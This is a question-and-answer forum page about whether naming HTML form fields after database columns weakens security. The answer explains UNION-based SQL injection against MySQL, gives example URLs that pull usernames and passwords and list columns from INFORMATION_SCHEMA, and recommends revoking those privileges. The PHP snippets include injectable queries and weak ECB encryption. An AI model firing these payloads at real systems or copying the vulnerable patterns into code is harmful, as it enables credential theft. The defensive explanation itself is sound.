Home/ Questions/Q 898323
In Process

The Archive Base Latest Questions

Editorial Team
  • 0
Asked: 2026-05-15T15:01:31+00:00

It is bad to name my form fields the same as my column names?

  • 0

It is bad to name my form fields the same as my column names? I mean do people really do:

 <?php
 $id = intval($_POST['user_unique_key']);
 $name = mysql_real_escape_string($_POST['name_of_user']);
 $email = mysql_real_escape_string($_POST['user_mail_thing']);
 $address = mysql_real_escape_string($_POST['user_place_of_living']);
 //....
 $sql = "INSERT INTO `users`('id','name','email','address') VALUES($id,$name,$email,$address)"
 ?>

Also note that the above data validation is horrible! I would never use it.

<a href="http://forums.devnetwork.net/viewtopic.php?f=50&t=118175">My Data Validation</a>

Should I use a table prefix like: ‘secret_prefix_’?

The final solution which I don’t really like is that I could use a two way hash to hash the field names. So have the input name be 

 <?php echo $field_name = base64_encode(mcrypt_encrypt( MCRYPT_RIJNDAEL_128, $key, $key, MCRYPT_MODE_ECB, $iv ));?>

and then decode the field name once it is posted

 <?php
  foreach($_POST as $name=> $value)
  {
  $input[base64_decode(mcrypt_decrypt( MCRYPT_RIJNDAEL_128, $key, $name, MCRYPT_MODE_ECB, $iv ))] = $value;
  }?>
Share

Leave an answer

You must login to add an answer.

Need An Account,

1 Answer

  1. Editorial Team

    It is bad to name my form fields the
    same as my column names?

    The short answer is Not always, changing the names of the columns/databases/tables can make the application more resistant to attack if your database is configured correctly. By default an attacker can obtain this data if he has sql injection, there for it doesn’t really matter if you give it to him.

    If you do want to obscure these names then you must also revoke access to the INFORMATION_SCHEMA database:

    REVOKE SELECT ON INFORMATION_SCHEMA.* TO mysql_app_user

    And here is the reason why:

    A common SQL Injection attack is to select juicy data from another table. In MySQL you cannot “stack quires” as in (insert into …; select * from …; grant …). So you have to use a “union select”.

    For instance:

    mysql_query("select path,type from images where id=".$_GET[id]);

    The corresponding exploit is as follows:

    http://localhost/sql_inj.php?id=0 union select username,password from users where id=1

    In this case the first select statement is going to be empty, no primary key will be zero. The 2nd select statement will select the username and password from the user table in the same database, this will grab the primary key of 1 which 99% of the time is the administrator. In order to pull this off you need to know the EXACT name of the table and the columns you need.

    Well, in mysql there is the information_schema database winch provides this data. So if the column and database names where obscured then they could still be obtained by the following:

    http://localhost/sql_inj.php?id=0 union select COLUMN_NAME,"junk" from FROM INFORMATION_SCHEMA.COLUMNS where COLUMN_NAME like "%user"

    This query will defeat any security prefix. However, this same attack could be used to obtain ALL columns, database and tables in the MySQL database. If you revoke select rights to the web application’s mysql user account, then he can’t do this. You should also revoke FILE privileges as these can be used to upload a backdoor or read configuration files.

    • 0